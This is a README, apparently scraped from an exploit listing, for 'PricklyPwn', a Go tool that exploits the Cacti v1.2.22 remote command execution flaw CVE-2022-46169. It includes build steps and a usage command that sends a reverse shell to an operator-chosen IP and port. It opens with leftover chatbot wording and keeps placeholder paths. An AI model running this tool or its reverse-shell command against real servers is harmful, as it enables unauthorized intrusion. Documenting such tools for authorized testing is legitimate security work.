Share
## https://sploitus.com/exploit?id=4A550465-BF05-55AE-8503-5203719B0A31
Sure! Here's a "dope" README.md for your `PricklyPwn` project:

---

# ๐ŸŒต PricklyPwn ๐ŸŒต

![Banner](path_to_your_project_banner.png)

*Penetrate with precision. A Remote Command Execution Exploit for Cacti v1.2.22.*

---

## Table of Contents
1. [Description](#description)
2. [Installation](#installation)
3. [Usage](#usage)
4. [Ethical Notice](#ethical-notice)

---

## Description

**PricklyPwn** is a sleek, high-performance tool crafted in Go, designed to exploit the Remote Command Execution (RCE) vulnerability found in Cacti versions up to v1.2.22. Built for security enthusiasts, ethical hackers, and defenders, it assists in comprehending and remediating the CVE-2022-46169 vulnerability.

---

## Installation

```bash
# Clone this repository
git clone https://github.com/your_username/PricklyPwn.git

# Navigate to the PricklyPwn directory
cd PricklyPwn

# Build the Go binary
go build -o PricklyPwn main.go
```

---

## Usage

```bash
# Basic usage
./PricklyPwn -url <target_url> -remote_ip <reverse_shell_ip> -remote_port <reverse_shell_port>
```

For more advanced options, refer to the documentation.

---

## ๐Ÿšจ Ethical Notice ๐Ÿšจ

This tool is strictly intended for educational and legal, authorized penetration testing purposes. Always get explicit permission before attempting any kind of testing. Unauthorized hacking is illegal and unethical. The `PricklyPwn` team cannot and will not bear responsibility for misuse.


---

## Acknowledgments

- Thanks to all security researchers who continuously push the boundaries and inspire tools like this.
- Special shoutout to the Cacti team for their commitment to making the internet a safer place.